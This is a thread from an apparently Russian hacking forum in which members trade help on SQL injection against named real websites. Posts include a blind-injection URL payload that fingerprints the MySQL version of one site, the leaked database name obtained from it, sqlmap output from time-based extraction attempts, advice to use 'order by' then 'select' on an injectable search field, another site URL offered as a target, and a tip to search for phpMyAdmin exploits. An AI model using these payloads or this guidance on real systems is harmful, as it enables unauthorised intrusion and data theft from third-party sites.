20.07.2013, 08:26
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от kcash
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?
Тут зависит от версии Phpmyadmin. Узнаешь версию и идешь в гугл за поиском експлоита, в гугле так и пишешь: exploit phpmyadmin
внекоторых версиях встречается такая уязвимость как php-Injection
|
|
|
22.07.2013, 10:54
|
|
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами:
6944726
Репутация:
0
|
|
http://www.drive-direct.ru/?go=servis&catid=38
Руками крутить скули, к сожалению, уже разучился. Havij принимает это за Blind-inj, а потом не может вытащить не таблицы, ни колонки. Вопрос - действительно ли это блайнд-инжект и крутится ли он?
|
|
|
|
22.07.2013, 14:02
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от rogatiy
http://www.drive-direct.ru/?go=servis&catid=38
Руками крутить скули, к сожалению, уже разучился. Havij принимает это за Blind-inj, а потом не может вытащить не таблицы, ни колонки. Вопрос - действительно ли это блайнд-инжект и крутится ли он?
Инъекция тут точно есть, 7 колонок в запросе.
Есть WAF. Пока даже версию не смог получить. Но пытаюсь.
Ну в общем это 3-я ветка MySQL
Код:
http://www.drive-direct.ru/?go=servis&catid=38+and+if((left(version(),1)=3),1,0)=1-- TRUE
|
|
|
|
22.07.2013, 15:06
|
|
Новичок
Регистрация: 04.07.2013
Сообщений: 3
С нами:
6767606
Репутация:
0
|
|
Сообщение от BigBear
Инъекция тут точно есть, 7 колонок в запросе.
Есть WAF. Пока даже версию не смог получить. Но пытаюсь.
Ну в общем это 3-я ветка MySQL
Код:
http://www.drive-direct.ru/?go=servis&catid=38+and+if((left(version(),1)=3),1,0)=1-- TRUE
Бд: MySQL 3
Название: 1gb_drivedir
|
|
|
|
22.07.2013, 17:49
|
|
Познающий
Регистрация: 06.04.2009
Сообщений: 30
С нами:
8999608
Репутация:
0
|
|
Вобщем постоянно натыкаюсь на одно и то же.. что хавиж, что sqlmap.. находим time-based инъекцию. но потом нещадно губит надежды нежеланием даже на уровне раскрытия таблиц. Т.е. иммя базы сказала, и вроде должно пойти но, не может почему-то.. то что у всех так установлены права на sql юзеров не поверю
[16:34:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:34:43] [INFO] retrieved:
[16:34:46] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:35:01] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[16:35:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:35:03] [CRITICAL] unable to retrieve the number of database users
это я юзерс хотел посмотреть.... собственно с этого всё начинается
|
|
|
|
22.07.2013, 20:22
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
При заходе на опредленную страничку, ничего не добавляя мне выкидывает "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/search.php on line 14" Можно ли это как нибудь использовать?
|
|
|
|
22.07.2013, 20:24
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Br@!ns
При заходе на опредленную страничку, ничего не добавляя мне выкидывает "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/search.php on line 14" Можно ли это как нибудь использовать?
нет!
|
|
|
|
22.07.2013, 21:01
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
хорошо) а даст ли нам что нибудь, если при вводе в строку поиска ковычки, нам выдаст ошибку sql syntax:
"DB query error.
Details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 3
Please try later."
Какие дальше стоит пути рассматривать? сразу искать что нибудь другое? или можно тут что либо попробовать?
|
|
|
|
22.07.2013, 21:06
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами:
9030789
Репутация:
704
|
|
Сообщение от Br@!ns
хорошо) а даст ли нам что нибудь, если при вводе в строку поиска ковычки, нам выдаст ошибку sql syntax:
"DB query error.
Details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 3
Please try later."
Какие дальше стоит пути рассматривать? сразу искать что нибудь другое? или можно тут что либо попробовать?
ордер бай потом селект
если фильтры не режут
|
|
|
|
22.07.2013, 22:21
|
|
Новичок
Регистрация: 20.12.2007
Сообщений: 19
С нами:
9680237
Репутация:
52
|
|
Что-то интересное:
senpolia.info/news/79'/
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [AVT]](/avatars/avatar46792.jpg?3548460){kind=avatar}
Похожие темы
Комбинированный вид
